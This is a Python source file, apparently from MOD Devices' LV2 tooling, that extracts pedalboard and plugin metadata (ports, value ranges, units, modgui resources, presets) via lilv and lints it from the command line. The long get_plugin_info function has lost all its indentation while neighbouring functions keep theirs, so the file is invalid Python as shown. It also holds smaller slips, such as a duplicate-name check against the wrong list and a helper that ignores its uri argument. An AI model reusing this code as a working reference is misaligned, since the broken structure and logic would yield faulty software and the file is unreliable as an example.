            "x"       : lilv.lilv_node_as_float(lilv.lilv_world_get(world.me, block.me, ns_ingen.canvasX.me, None)),
            "y"       : lilv.lilv_node_as_float(lilv.lilv_world_get(world.me, block.me, ns_ingen.canvasY.me, None)),
            "enabled" : lilv.lilv_node_as_bool(enabled) if enabled is not None else False,
            "builder" : lilv.lilv_node_as_int(builder) if builder else 0,
            "release" : lilv.lilv_node_as_int(release) if release else 0,
            "minorVersion": lilv.lilv_node_as_int(minorver) if minorver else 0,
            "microVersion": lilv.lilv_node_as_int(microver) if microver else 0,
        })

    info['connections'] = ingenarcs
    info['plugins']     = ingenblocks

    return info
# ------------------------------------------------------------------------------------------------------------
# get_pedalboard_name
# Faster version of get_pedalboard_info when we just need to know the pedalboard name
# @a bundle is a string, consisting of a directory in the filesystem (absolute pathname).
def get_pedalboard_name(bundle):
    """Return just the pedalboard name from an LV2 bundle.

    Faster version of get_pedalboard_info() for when only the name is needed.
    @a bundle is a string, consisting of a directory in the filesystem
    (absolute pathname). Raises Exception if the bundle does not contain
    exactly one mod:Pedalboard plugin.

    Fix: the error messages were copy-pasted from get_pedalboard_info() and
    used a '%s' placeholder together with str.format(), so neither the
    correct function name nor the bundle path was ever shown; they now name
    this function and use '{0}' replacement fields.
    """
    # lilv wants the last character as the separator
    bundle = os.path.abspath(bundle)
    if not bundle.endswith(os.sep):
        bundle += os.sep

    # Create our own unique lilv world
    # We'll load a single bundle and get all plugins from it
    world = lilv.World()

    # this is needed when loading specific bundles instead of load_all
    # (these functions are not exposed via World yet)
    lilv.lilv_world_load_specifications(world.me)
    lilv.lilv_world_load_plugin_classes(world.me)

    # convert bundle string into a lilv node
    bundlenode = lilv.lilv_new_file_uri(world.me, None, bundle)

    # load the bundle
    world.load_bundle(bundlenode)

    # free bundlenode, no longer needed
    lilv.lilv_node_free(bundlenode)

    # get all plugins in the bundle
    plugins = world.get_all_plugins()

    # make sure the bundle includes 1 and only 1 plugin (the pedalboard)
    if plugins.size() != 1:
        raise Exception('get_pedalboard_name({0}) - bundle has 0 or > 1 plugin'.format(bundle))

    # no indexing in python-lilv yet, just get the first item
    plugin = None
    for p in plugins:
        plugin = p
        break

    if plugin is None:
        raise Exception('get_pedalboard_name({0}) - failed to get plugin, you are using an old lilv!'.format(bundle))

    # define the needed stuff
    ns_rdf = NS(world, lilv.LILV_NS_RDF)

    # check if the plugin is a pedalboard
    def fill_in_type(node):
        return node.as_string()
    plugin_types = [i for i in LILV_FOREACH(plugin.get_value(ns_rdf.type_), fill_in_type)]

    if "http://moddevices.com/ns/modpedal#Pedalboard" not in plugin_types:
        raise Exception('get_pedalboard_name({0}) - plugin has no mod:Pedalboard type'.format(bundle))

    return plugin.get_name().as_string()
# ------------------------------------------------------------------------------------------------------------
# plugin_has_modgui
# Check if a plugin has modgui
def plugin_has_modgui(world, plugin):
    """Return True if `plugin` declares a usable modgui.

    Among the declared modgui:gui nodes, the last one with a resources
    directory wins, except that a modgui located under the user's home
    directory is preferred as soon as one is found. The selected gui counts
    only if its resources directory actually exists on disk.
    """
    # define the needed stuff
    ns_modgui = NS(world, "http://moddevices.com/ns/modgui#")

    # --------------------------------------------------------------------------------------------------------
    # pick the proper modgui

    selected_gui = None
    guis = plugin.get_value(ns_modgui.gui)
    it = guis.begin()
    while not guis.is_end(it):
        gui = guis.get(it)
        it = guis.next(it)

        if gui.me is None:
            continue

        resdir = world.find_nodes(gui.me, ns_modgui.resourcesDirectory.me, None).get_first()
        if resdir.me is None:
            continue

        selected_gui = gui
        if os.path.expanduser("~") in lilv.lilv_uri_to_path(resdir.as_string()):
            # found a modgui in the home dir, stop here and use it
            break

    del guis, it

    # --------------------------------------------------------------------------------------------------------
    # check selected modgui

    if selected_gui is None or selected_gui.me is None:
        return False

    # resourcesDirectory *must* be present
    modgui_resdir = world.find_nodes(selected_gui.me, ns_modgui.resourcesDirectory.me, None).get_first()
    if modgui_resdir.me is None:
        return False

    return os.path.exists(lilv.lilv_uri_to_path(modgui_resdir.as_string()))
# ------------------------------------------------------------------------------------------------------------
# get_plugin_info
# Get info from a lilv plugin
# This is used in get_plugins_info below and MOD-SDK
def get_plugin_info(world, plugin, useAbsolutePath = True):
# define the needed stuff
ns_doap = NS(world, lilv.LILV_NS_DOAP)
ns_foaf = NS(world, lilv.LILV_NS_FOAF)
ns_rdf = NS(world, lilv.LILV_NS_RDF)
ns_rdfs = NS(world, lilv.LILV_NS_RDFS)
ns_lv2core = NS(world, lilv.LILV_NS_LV2)
ns_atom = NS(world, "http://lv2plug.in/ns/ext/atom#")
ns_midi = NS(world, "http://lv2plug.in/ns/ext/midi#")
ns_morph = NS(world, "http://lv2plug.in/ns/ext/morph#")
ns_pprops = NS(world, "http://lv2plug.in/ns/ext/port-props#")
ns_pset = NS(world, "http://lv2plug.in/ns/ext/presets#")
ns_units = NS(world, "http://lv2plug.in/ns/extensions/units#")
ns_mod = NS(world, "http://moddevices.com/ns/mod#")
ns_modgui = NS(world, "http://moddevices.com/ns/modgui#")
bundleuri = plugin.get_bundle_uri().as_string()
bundle = lilv.lilv_uri_to_path(bundleuri)
errors = []
warnings = []
# --------------------------------------------------------------------------------------------------------
# uri
uri = plugin.get_uri().as_string() or ""
if not uri:
errors.append("plugin uri is missing or invalid")
elif uri.startswith("file:"):
errors.append("plugin uri is local, and thus not suitable for redistribution")
#elif not (uri.startswith("http:") or uri.startswith("https:")):
#warnings.append("plugin uri is not a real url")
# --------------------------------------------------------------------------------------------------------
# name
name = plugin.get_name().as_string() or ""
if not name:
errors.append("plugin name is missing")
# --------------------------------------------------------------------------------------------------------
# binary
binary = lilv.lilv_uri_to_path(plugin.get_library_uri().as_string() or "")
if not binary:
errors.append("plugin binary is missing")
elif not useAbsolutePath:
binary = binary.replace(bundle,"",1)
# --------------------------------------------------------------------------------------------------------
# license
license = plugin.get_value(ns_doap.license).get_first().as_string() or ""
if not license:
prj = plugin.get_value(ns_lv2core.project).get_first()
if prj.me is not None:
licsnode = lilv.lilv_world_get(world.me, prj.me, ns_doap.license.me, None)
if licsnode is not None:
license = lilv.lilv_node_as_string(licsnode)
del licsnode
del prj
if not license:
errors.append("plugin license is missing")
elif license.startswith(bundleuri):
license = license.replace(bundleuri,"",1)
warnings.append("plugin license entry is a local path instead of a string")
# --------------------------------------------------------------------------------------------------------
# comment
comment = (plugin.get_value(ns_rdfs.comment).get_first().as_string() or "").strip()
# sneaky empty comments!
if len(comment) > 0 and comment == len(comment) * comment[0]:
comment = ""
if not comment:
errors.append("plugin comment is missing")
# --------------------------------------------------------------------------------------------------------
# version
microver = plugin.get_value(ns_lv2core.microVersion).get_first()
minorver = plugin.get_value(ns_lv2core.minorVersion).get_first()
if microver.me is None and minorver.me is None:
errors.append("plugin is missing version information")
minorVersion = 0
microVersion = 0
else:
if minorver.me is None:
errors.append("plugin is missing minorVersion")
minorVersion = 0
else:
minorVersion = minorver.as_int()
if microver.me is None:
errors.append("plugin is missing microVersion")
microVersion = 0
else:
microVersion = microver.as_int()
del minorver
del microver
version = "%d.%d" % (minorVersion, microVersion)
# 0.x is experimental
if minorVersion == 0:
stability = "experimental"
# odd x.2 or 2.x is testing/development
elif minorVersion % 2 != 0 or microVersion % 2 != 0:
stability = "testing"
# otherwise it's stable
else:
stability = "stable"
# --------------------------------------------------------------------------------------------------------
# author
author = {
'name' : plugin.get_author_name().as_string() or "",
'homepage': plugin.get_author_homepage().as_string() or "",
'email' : plugin.get_author_email().as_string() or "",
}
if not author['name']:
errors.append("plugin author name is missing")
if not author['homepage']:
prj = plugin.get_value(ns_lv2core.project).get_first()
if prj.me is not None:
maintainer = lilv.lilv_world_get(world.me, prj.me, ns_doap.maintainer.me, None)
if maintainer is not None:
homepage = lilv.lilv_world_get(world.me, maintainer, ns_foaf.homepage.me, None)
if homepage is not None:
author['homepage'] = lilv.lilv_node_as_string(homepage)
del homepage
del maintainer
del prj
if not author['homepage']:
warnings.append("plugin author homepage is missing")
if not author['email']:
pass
elif author['email'].startswith(bundleuri):
author['email'] = author['email'].replace(bundleuri,"",1)
warnings.append("plugin author email entry is missing 'mailto:' prefix")
elif author['email'].startswith("mailto:"):
author['email'] = author['email'].replace("mailto:","",1)
# --------------------------------------------------------------------------------------------------------
# brand
brand = plugin.get_value(ns_mod.brand).get_first().as_string() or ""
if not brand:
brand = author['name'].split(" - ",1)[0].split(" ",1)[0]
brand = brand.rstrip(",").rstrip(";")
if len(brand) > 11:
brand = brand[:11]
warnings.append("plugin brand is missing")
elif len(brand) > 11:
brand = brand[:11]
errors.append("plugin brand has more than 11 characters")
# --------------------------------------------------------------------------------------------------------
# label
label = plugin.get_value(ns_mod.label).get_first().as_string() or ""
if not label:
if len(name) <= 16:
label = name
else:
labels = name.split(" - ",1)[0].split(" ")
if labels[0].lower() in bundle.lower() and len(labels) > 1 and not labels[1].startswith(("(","[")):
label = labels[1]
else:
label = labels[0]
if len(label) > 16:
label = label[:16]
warnings.append("plugin label is missing")
del labels
elif len(label) > 16:
label = label[:16]
errors.append("plugin label has more than 16 characters")
# --------------------------------------------------------------------------------------------------------
# bundles
bundles = []
if useAbsolutePath:
bnodes = lilv.lilv_plugin_get_data_uris(plugin.me)
it = lilv.lilv_nodes_begin(bnodes)
while not lilv.lilv_nodes_is_end(bnodes, it):
bnode = lilv.lilv_nodes_get(bnodes, it)
it = lilv.lilv_nodes_next(bnodes, it)
if bnode is None:
continue
if not lilv.lilv_node_is_uri(bnode):
continue
bpath = os.path.abspath(os.path.dirname(lilv.lilv_uri_to_path(lilv.lilv_node_as_uri(bnode))))
if not bpath.endswith(os.sep):
bpath += os.sep
if bpath not in bundles:
bundles.append(bpath)
if bundle not in bundles:
bundles.append(bundle)
del bnodes, it
# --------------------------------------------------------------------------------------------------------
# get the proper modgui
modguigui = None
nodes = plugin.get_value(ns_modgui.gui)
it = nodes.begin()
while not nodes.is_end(it):
mgui = nodes.get(it)
it = nodes.next(it)
if mgui.me is None:
continue
resdir = world.find_nodes(mgui.me, ns_modgui.resourcesDirectory.me, None).get_first()
if resdir.me is None:
continue
modguigui = mgui
if not useAbsolutePath:
# special build, use first modgui found
break
if os.path.expanduser("~") in lilv.lilv_uri_to_path(resdir.as_string()):
# found a modgui in the home dir, stop here and use it
break
del nodes, it
# --------------------------------------------------------------------------------------------------------
# gui
gui = {}
if modguigui is None or modguigui.me is None:
warnings.append("no modgui available")
else:
# resourcesDirectory *must* be present
modgui_resdir = world.find_nodes(modguigui.me, ns_modgui.resourcesDirectory.me, None).get_first()
if modgui_resdir.me is None:
errors.append("modgui has no resourcesDirectory data")
else:
if useAbsolutePath:
gui['resourcesDirectory'] = lilv.lilv_uri_to_path(modgui_resdir.as_string())
# check if modgui is defined in a separate file
gui['usingSeeAlso'] = os.path.exists(os.path.join(bundle, "modgui.ttl"))
# check if the modgui definition is on its own file and in the user dir
gui['modificableInPlace'] = bool((bundle not in gui['resourcesDirectory'] or gui['usingSeeAlso']) and
os.path.expanduser("~") in gui['resourcesDirectory'])
else:
gui['resourcesDirectory'] = modgui_resdir.as_string().replace(bundleuri,"",1)
# icon and settings templates
modgui_icon = world.find_nodes(modguigui.me, ns_modgui.iconTemplate .me, None).get_first()
modgui_setts = world.find_nodes(modguigui.me, ns_modgui.settingsTemplate.me, None).get_first()
if modgui_icon.me is None:
errors.append("modgui has no iconTemplate data")
else:
iconFile = lilv.lilv_uri_to_path(modgui_icon.as_string())
if os.path.exists(iconFile):
gui['iconTemplate'] = iconFile if useAbsolutePath else iconFile.replace(bundle,"",1)
else:
errors.append("modgui iconTemplate file is missing")
del iconFile
if modgui_setts.me is not None:
settingsFile = lilv.lilv_uri_to_path(modgui_setts.as_string())
if os.path.exists(settingsFile):
gui['settingsTemplate'] = settingsFile if useAbsolutePath else settingsFile.replace(bundle,"",1)
else:
errors.append("modgui settingsTemplate file is missing")
del settingsFile
# javascript and stylesheet files
modgui_script = world.find_nodes(modguigui.me, ns_modgui.javascript.me, None).get_first()
modgui_style = world.find_nodes(modguigui.me, ns_modgui.stylesheet.me, None).get_first()
if modgui_script.me is not None:
javascriptFile = lilv.lilv_uri_to_path(modgui_script.as_string())
if os.path.exists(javascriptFile):
gui['javascript'] = javascriptFile if useAbsolutePath else javascriptFile.replace(bundle,"",1)
else:
errors.append("modgui javascript file is missing")
del javascriptFile
if modgui_style.me is None:
errors.append("modgui has no stylesheet data")
else:
stylesheetFile = lilv.lilv_uri_to_path(modgui_style.as_string())
if os.path.exists(stylesheetFile):
gui['stylesheet'] = stylesheetFile if useAbsolutePath else stylesheetFile.replace(bundle,"",1)
else:
errors.append("modgui stylesheet file is missing")
del stylesheetFile
# template data for backwards compatibility
# FIXME remove later once we got rid of all templateData files
modgui_templ = world.find_nodes(modguigui.me, ns_modgui.templateData.me, None).get_first()
if modgui_templ.me is not None:
warnings.append("modgui is using old deprecated templateData")
templFile = lilv.lilv_uri_to_path(modgui_templ.as_string())
if os.path.exists(templFile):
with open(templFile, 'r') as fd:
try:
data = json.loads(fd.read())
except:
data = {}
keys = list(data.keys())
if 'author' in keys:
gui['brand'] = data['author']
if 'label' in keys:
gui['label'] = data['label']
if 'color' in keys:
gui['color'] = data['color']
if 'knob' in keys:
gui['knob'] = data['knob']
if 'controls' in keys:
index = 0
ports = []
for ctrl in data['controls']:
ports.append({
'index' : index,
'name' : ctrl['name'],
'symbol': ctrl['symbol'],
})
index += 1
gui['ports'] = ports
del templFile
# screenshot and thumbnail
modgui_scrn = world.find_nodes(modguigui.me, ns_modgui.screenshot.me, None).get_first()
modgui_thumb = world.find_nodes(modguigui.me, ns_modgui.thumbnail .me, None).get_first()
if modgui_scrn.me is not None:
gui['screenshot'] = lilv.lilv_uri_to_path(modgui_scrn.as_string())
if not os.path.exists(gui['screenshot']):
errors.append("modgui screenshot file is missing")
if not useAbsolutePath:
gui['screenshot'] = gui['screenshot'].replace(bundle,"",1)
else:
errors.append("modgui has no screnshot data")
if modgui_thumb.me is not None:
gui['thumbnail'] = lilv.lilv_uri_to_path(modgui_thumb.as_string())
if not os.path.exists(gui['thumbnail']):
errors.append("modgui thumbnail file is missing")
if not useAbsolutePath:
gui['thumbnail'] = gui['thumbnail'].replace(bundle,"",1)
else:
errors.append("modgui has no thumbnail data")
# extra stuff, all optional
modgui_brand = world.find_nodes(modguigui.me, ns_modgui.brand.me, None).get_first()
modgui_label = world.find_nodes(modguigui.me, ns_modgui.label.me, None).get_first()
modgui_model = world.find_nodes(modguigui.me, ns_modgui.model.me, None).get_first()
modgui_panel = world.find_nodes(modguigui.me, ns_modgui.panel.me, None).get_first()
modgui_color = world.find_nodes(modguigui.me, ns_modgui.color.me, None).get_first()
modgui_knob = world.find_nodes(modguigui.me, ns_modgui.knob .me, None).get_first()
if modgui_brand.me is not None:
gui['brand'] = modgui_brand.as_string()
if modgui_label.me is not None:
gui['label'] = modgui_label.as_string()
if modgui_model.me is not None:
gui['model'] = modgui_model.as_string()
if modgui_panel.me is not None:
gui['panel'] = modgui_panel.as_string()
if modgui_color.me is not None:
gui['color'] = modgui_color.as_string()
if modgui_knob.me is not None:
gui['knob'] = modgui_knob.as_string()
# ports
errpr = False
sybls = []
ports = []
nodes = world.find_nodes(modguigui.me, ns_modgui.port.me, None)
it = lilv.lilv_nodes_begin(nodes.me)
while not lilv.lilv_nodes_is_end(nodes.me, it):
port = lilv.lilv_nodes_get(nodes.me, it)
it = lilv.lilv_nodes_next(nodes.me, it)
if port is None:
break
port_indx = world.find_nodes(port, ns_lv2core.index .me, None).get_first()
port_symb = world.find_nodes(port, ns_lv2core.symbol.me, None).get_first()
port_name = world.find_nodes(port, ns_lv2core.name .me, None).get_first()
if None in (port_indx.me, port_name.me, port_symb.me):
if not errpr:
errors.append("modgui has some invalid port data")
errpr = True
continue
port_indx = port_indx.as_int()
port_symb = port_symb.as_string()
port_name = port_name.as_string()
ports.append({
'index' : port_indx,
'symbol': port_symb,
'name' : port_name,
})
if port_symb not in sybls:
sybls.append(port_symb)
elif not errpr:
errors.append("modgui has some duplicated port symbols")
errpr = True
# sort ports
if len(ports) > 0:
ports2 = {}
for port in ports:
ports2[port['index']] = port
gui['ports'] = [ports2[i] for i in ports2]
del ports2
# cleanup
del ports, nodes, it
# --------------------------------------------------------------------------------------------------------
# ports
index = 0
ports = {
'audio' : { 'input': [], 'output': [] },
'control': { 'input': [], 'output': [] },
'midi' : { 'input': [], 'output': [] }
}
portsymbols = []
portnames = []
# function for filling port info
def fill_port_info(port):
# base data
portname = lilv.lilv_node_as_string(port.get_name()) or ""
if not portname:
portname = "_%i" % index
errors.append("port with index %i has no name" % index)
portsymbol = lilv.lilv_node_as_string(port.get_symbol()) or ""
if not portsymbol:
portsymbol = "_%i" % index
errors.append("port with index %i has no symbol" % index)
# check for duplicate names
if portname in portsymbols:
warnings.append("port name '%s' is not unique" % portname)
else:
portnames.append(portname)
# check for duplicate symbols
if portsymbol in portsymbols:
errors.append("port symbol '%s' is not unique" % portsymbol)
else:
portsymbols.append(portsymbol)
# short name
psname = lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.shortName.me))
if psname is not None:
psname = lilv.lilv_node_as_string(psname) or ""
if not psname:
psname = get_short_port_name(portname)
if len(psname) > 16:
warnings.append("port '%s' name is too big, reduce the name size or provide a shortName" % portname)
elif len(psname) > 16:
psname = psname[:16]
errors.append("port '%s' short name has more than 16 characters" % portname)
# check for old style shortName
if port.get_value(ns_lv2core.shortname.me) is not None:
errors.append("port '%s' short name is using old style 'shortname' instead of 'shortName'" % portname)
# port types
types = [typ.rsplit("#",1)[-1].replace("Port","",1) for typ in get_port_data(port, ns_rdf.type_)]
if "Atom" in types \
and port.supports_event(ns_midi.MidiEvent.me) \
and lilv.Nodes(port.get_value(ns_atom.bufferType.me)).get_first() == ns_atom.Sequence:
types.append("MIDI")
#if "Morph" in types:
#morphtyp = lilv.lilv_nodes_get_first(port.get_value(ns_morph.supportsType.me))
#if morphtyp is not None:
#morphtyp = lilv.lilv_node_as_uri(morphtyp)
#if morphtyp:
#types.append(morphtyp.rsplit("#",1)[-1].replace("Port","",1))
# port comment
pcomment = (get_port_data(port, ns_rdfs.comment) or [""])[0]
# port designation
designation = (get_port_data(port, ns_lv2core.designation) or [""])[0]
# port rangeSteps
rangeSteps = (get_port_data(port, ns_mod.rangeSteps) or get_port_data(port, ns_pprops.rangeSteps) or [None])[0]
# port properties
properties = [typ.rsplit("#",1)[-1] for typ in get_port_data(port, ns_lv2core.portProperty)]
# data
ranges = {}
scalepoints = []
# unit block
ulabel = ""
urender = ""
usymbol = ""
# control and cv must contain ranges, might contain scale points
if "Control" in types or "CV" in types:
isInteger = "integer" in properties
if isInteger and "CV" in types:
errors.append("port '%s' has integer property and CV type" % portname)
xdefault = lilv.lilv_nodes_get_first(port.get_value(ns_mod.default.me)) or \
lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.default.me))
xminimum = lilv.lilv_nodes_get_first(port.get_value(ns_mod.minimum.me)) or \
lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.minimum.me))
xmaximum = lilv.lilv_nodes_get_first(port.get_value(ns_mod.maximum.me)) or \
lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.maximum.me))
if xminimum is not None and xmaximum is not None:
if isInteger:
if is_integer(lilv.lilv_node_as_string(xminimum)):
ranges['minimum'] = lilv.lilv_node_as_int(xminimum)
else:
ranges['minimum'] = lilv.lilv_node_as_float(xminimum)
if fmod(ranges['minimum'], 1.0) == 0.0:
warnings.append("port '%s' has integer property but minimum value is float" % portname)
else:
errors.append("port '%s' has integer property but minimum value has non-zero decimals" % portname)
ranges['minimum'] = int(ranges['minimum'])
if is_integer(lilv.lilv_node_as_string(xmaximum)):
ranges['maximum'] = lilv.lilv_node_as_int(xmaximum)
else:
ranges['maximum'] = lilv.lilv_node_as_float(xmaximum)
if fmod(ranges['maximum'], 1.0) == 0.0:
warnings.append("port '%s' has integer property but maximum value is float" % portname)
else:
errors.append("port '%s' has integer property but maximum value has non-zero decimals" % portname)
ranges['maximum'] = int(ranges['maximum'])
else:
ranges['minimum'] = lilv.lilv_node_as_float(xminimum)
ranges['maximum'] = lilv.lilv_node_as_float(xmaximum)
if is_integer(lilv.lilv_node_as_string(xminimum)):
warnings.append("port '%s' minimum value is an integer" % portname)
if is_integer(lilv.lilv_node_as_string(xmaximum)):
warnings.append("port '%s' maximum value is an integer" % portname)
if ranges['minimum'] >= ranges['maximum']:
ranges['maximum'] = ranges['minimum'] + (1 if isInteger else 0.1)
errors.append("port '%s' minimum value is equal or higher than its maximum" % portname)
if xdefault is not None:
if isInteger:
if is_integer(lilv.lilv_node_as_string(xdefault)):
ranges['default'] = lilv.lilv_node_as_int(xdefault)
else:
ranges['default'] = lilv.lilv_node_as_float(xdefault)
if fmod(ranges['default'], 1.0) == 0.0:
warnings.append("port '%s' has integer property but default value is float" % portname)
else:
errors.append("port '%s' has integer property but default value has non-zero decimals" % portname)
ranges['default'] = int(ranges['default'])
else:
ranges['default'] = lilv.lilv_node_as_float(xdefault)
if is_integer(lilv.lilv_node_as_string(xdefault)):
warnings.append("port '%s' default value is an integer" % portname)
testmin = ranges['minimum']
testmax = ranges['maximum']
if "sampleRate" in properties:
testmin *= 48000
testmax *= 48000
if not (testmin <= ranges['default'] <= testmax):
ranges['default'] = ranges['minimum']
errors.append("port '%s' default value is out of bounds" % portname)
else:
ranges['default'] = ranges['minimum']
if "Input" in types:
errors.append("port '%s' is missing default value" % portname)
else:
if isInteger:
ranges['minimum'] = 0
ranges['maximum'] = 1
ranges['default'] = 0
else:
ranges['minimum'] = -1.0 if "CV" in types else 0.0
ranges['maximum'] = 1.0
ranges['default'] = 0.0
if "CV" not in types and designation != "http://lv2plug.in/ns/lv2core#latency":
errors.append("port '%s' is missing value ranges" % portname)
nodes = port.get_scale_points()
if nodes is not None:
scalepoints_unsorted = []
it = lilv.lilv_scale_points_begin(nodes)
while not lilv.lilv_scale_points_is_end(nodes, it):
sp = lilv.lilv_scale_points_get(nodes, it)
it = lilv.lilv_scale_points_next(nodes, it)
if sp is None:
continue
label = lilv.lilv_scale_point_get_label(sp)
value = lilv.lilv_scale_point_get_value(sp)
if label is None:
errors.append("a port scalepoint is missing its label")
continue
label = lilv.lilv_node_as_string(label) or ""
if not label:
errors.append("a port scalepoint is missing its label")
continue
if value is None:
errors.append("port scalepoint '%s' is missing its value" % label)
continue
if isInteger:
if is_integer(lilv.lilv_node_as_string(value)):
value = lilv.lilv_node_as_int(value)
else:
value = lilv.lilv_node_as_float(value)
if fmod(value, 1.0) == 0.0:
warnings.append("port '%s' has integer property but scalepoint '%s' value is float" % (portname, label))
else:
errors.append("port '%s' has integer property but scalepoint '%s' value has non-zero decimals" % (portname, label))
value = int(value)
else:
if is_integer(lilv.lilv_node_as_string(value)):
warnings.append("port '%s' scalepoint '%s' value is an integer" % (portname, label))
value = lilv.lilv_node_as_float(value)
if ranges['minimum'] <= value <= ranges['maximum']:
scalepoints_unsorted.append((value, label))
else:
errors.append(("port scalepoint '%s' has an out-of-bounds value:\n" % label) +
("%d < %d < %d" if isInteger else "%f < %f < %f") % (ranges['minimum'], value, ranges['maximum']))
if len(scalepoints_unsorted) != 0:
unsorted = dict(s for s in scalepoints_unsorted)
values = list(v for v, l in scalepoints_unsorted)
values.sort()
scalepoints = list({ 'value': v, 'label': unsorted[v] } for v in values)
del unsorted, values
del scalepoints_unsorted
if "enumeration" in properties and len(scalepoints) <= 1:
errors.append("port '%s' wants to use enumeration but doesn't have enough values" % portname)
properties.remove("enumeration")
# control ports might contain unit
if "Control" in types:
# unit
uunit = lilv.lilv_nodes_get_first(port.get_value(ns_units.unit.me))
if uunit is not None:
uuri = lilv.lilv_node_as_uri(uunit)
# using pre-existing lv2 unit
if uuri is not None and uuri.startswith("http://lv2plug.in/ns/"):
uuri = uuri.replace("http://lv2plug.in/ns/extensions/units#","",1)
alnum = uuri.isalnum()
if not alnum:
errors.append("port '%s' has wrong lv2 unit uri" % portname)
uuri = uuri.rsplit("#",1)[-1].rsplit("/",1)[-1]
ulabel, urender, usymbol = get_port_unit(uuri)
if alnum and not (ulabel and urender and usymbol):
errors.append("port '%s' has unknown lv2 unit (our bug?, data is '%s', '%s', '%s')" % (portname,
ulabel,
urender,
usymbol))
# using custom unit
else:
xlabel = world.find_nodes(uunit, ns_rdfs .label.me, None).get_first()
xrender = world.find_nodes(uunit, ns_units.render.me, None).get_first()
xsymbol = world.find_nodes(uunit, ns_units.symbol.me, None).get_first()
if xlabel.me is not None:
ulabel = xlabel.as_string()
else:
errors.append("port '%s' has custom unit with no label" % portname)
if xrender.me is not None:
urender = xrender.as_string()
else:
errors.append("port '%s' has custom unit with no render" % portname)
if xsymbol.me is not None:
usymbol = xsymbol.as_string()
else:
errors.append("port '%s' has custom unit with no symbol" % portname)
return (types, {
'name' : portname,
'symbol' : portsymbol,
'ranges' : ranges,
'units' : {
'label' : ulabel,
'render': urender,
'symbol': usymbol,
} if "Control" in types and ulabel and urender and usymbol else {},
'comment' : pcomment,
'designation': designation,
'properties' : properties,
'rangeSteps' : rangeSteps,
'scalePoints': scalepoints,
'shortName' : psname,
})
for p in (plugin.get_port_by_index(i) for i in range(plugin.get_num_ports())):
types, info = fill_port_info(p)
info['index'] = index
index += 1
isInput = "Input" in types
types.remove("Input" if isInput else "Output")
for typ in [typl.lower() for typl in types]:
if typ not in ports.keys():
ports[typ] = { 'input': [], 'output': [] }
ports[typ]["input" if isInput else "output"].append(info)
# --------------------------------------------------------------------------------------------------------
# presets
def get_preset_data(preset):
world.load_resource(preset.me)
uri = preset.as_string() or ""
label = world.find_nodes(preset.me, ns_rdfs.label.me, None).get_first().as_string() or ""
if not uri:
errors.append("preset with label '%s' has no uri" % (label or "<unknown>"))
if not label:
errors.append("preset with uri '%s' has no label" % (uri or "<unknown>"))
return (uri, label)
presets = []
presets_related = plugin.get_related(ns_pset.Preset)
presets_data = list(LILV_FOREACH(presets_related, get_preset_data))
if len(presets_data) != 0:
unsorted = dict(p for p in presets_data)
uris = list(unsorted.keys())
uris.sort()
presets = list({ 'uri': p, 'label': unsorted[p] } for p in uris)
del unsorted, uris
del presets_related
# --------------------------------------------------------------------------------------------------------
# done
return {
'uri' : uri,
'name': name,
'binary' : binary,
'brand' : brand,
'label' : label,
'license': license,
'comment': comment,
'category' : get_category(plugin.get_value(ns_rdf.type_)),
'microVersion': microVersion,
'minorVersion': minorVersion,
'version' : version,
'stability': stability,
'author' : author,
'bundles': bundles,
'gui' : gui,
'ports' : ports,
'presets': presets,
'errors' : errors,
'warnings': warnings,
}
# ------------------------------------------------------------------------------------------------------------
# get_plugin_info_helper
# Get info from a simple URI, without the need of your own lilv world
# This is used by get_plugins_info in MOD-SDK
def get_plugin_info_helper(uri):
    """Collect info dicts for every LV2 plugin installed on the system.

    A fresh lilv world is created and fully loaded, then each plugin is
    passed through ``get_plugin_info`` with relative paths.
    Note: the ``uri`` argument is currently unused -- kept for interface
    compatibility with the callers.
    """
    w = lilv.World()
    w.load_all()
    return [get_plugin_info(w, plugin, False) for plugin in w.get_all_plugins()]
# ------------------------------------------------------------------------------------------------------------
# get_plugins_info
# Get plugin-related info from a list of lv2 bundles
# @a bundles is a list of strings, consisting of directories in the filesystem (absolute pathnames).
def get_plugins_info(bundles):
    """Load the given LV2 bundle directories into a private lilv world and
    return the ``get_plugin_info`` data (with relative paths) for every
    plugin found in them.

    ``bundles`` is a list of absolute directory paths in the filesystem.
    Raises Exception when ``bundles`` is empty or yields no plugins.
    """
    # if empty, do nothing
    if len(bundles) == 0:
        raise Exception('get_plugins_info() - no bundles provided')
    # Create our own unique lilv world
    # We'll load the selected bundles and get all plugins from it
    world = lilv.World()
    # this is needed when loading specific bundles instead of load_all
    # (these functions are not exposed via World yet)
    lilv.lilv_world_load_specifications(world.me)
    lilv.lilv_world_load_plugin_classes(world.me)
    # load all bundles
    for bundle in bundles:
        # lilv wants the last character as the separator
        bundle = os.path.abspath(bundle)
        if not bundle.endswith(os.sep):
            bundle += os.sep
        # convert bundle string into a lilv node
        bundlenode = lilv.lilv_new_file_uri(world.me, None, bundle)
        # load the bundle
        world.load_bundle(bundlenode)
        # free bundlenode, no longer needed (lilv C object, not garbage-collected)
        lilv.lilv_node_free(bundlenode)
    # get all plugins available in the selected bundles
    plugins = world.get_all_plugins()
    # make sure the bundles include something
    if plugins.size() == 0:
        raise Exception('get_plugins_info() - selected bundles have no plugins')
    # return all the info
    return [get_plugin_info(world, p, False) for p in plugins]
# ------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
    from sys import argv, exit
    from pprint import pprint
    # Lint the LV2 bundles given on the command line and print the remaining
    # errors/warnings per plugin, filtering out warnings considered noise here.
    #get_plugins_info(argv[1:])
    #for i in get_plugins_info(argv[1:]): pprint(i)
    #exit(0)
    for i in get_plugins_info(argv[1:]):
        # iterate over a copy, since the selected warnings are removed in place
        warnings = i['warnings'].copy()
        if 'plugin brand is missing' in warnings:
            i['warnings'].remove('plugin brand is missing')
        if 'plugin label is missing' in warnings:
            i['warnings'].remove('plugin label is missing')
        if 'no modgui available' in warnings:
            i['warnings'].remove('no modgui available')
        for warn in warnings:
            if "has no short name" in warn:
                i['warnings'].remove(warn)
        pprint({
            'uri'     : i['uri'],
            'errors'  : i['errors'],
            'warnings': i['warnings']
        }, width=200)
# ------------------------------------------------------------------------------------------------------------
| 38.94844 | 147 | 0.529977 | 372 | 0.00648 | 154 | 0.002682 | 0 | 0 | 0 | 0 | 16,777 | 0.292231 |
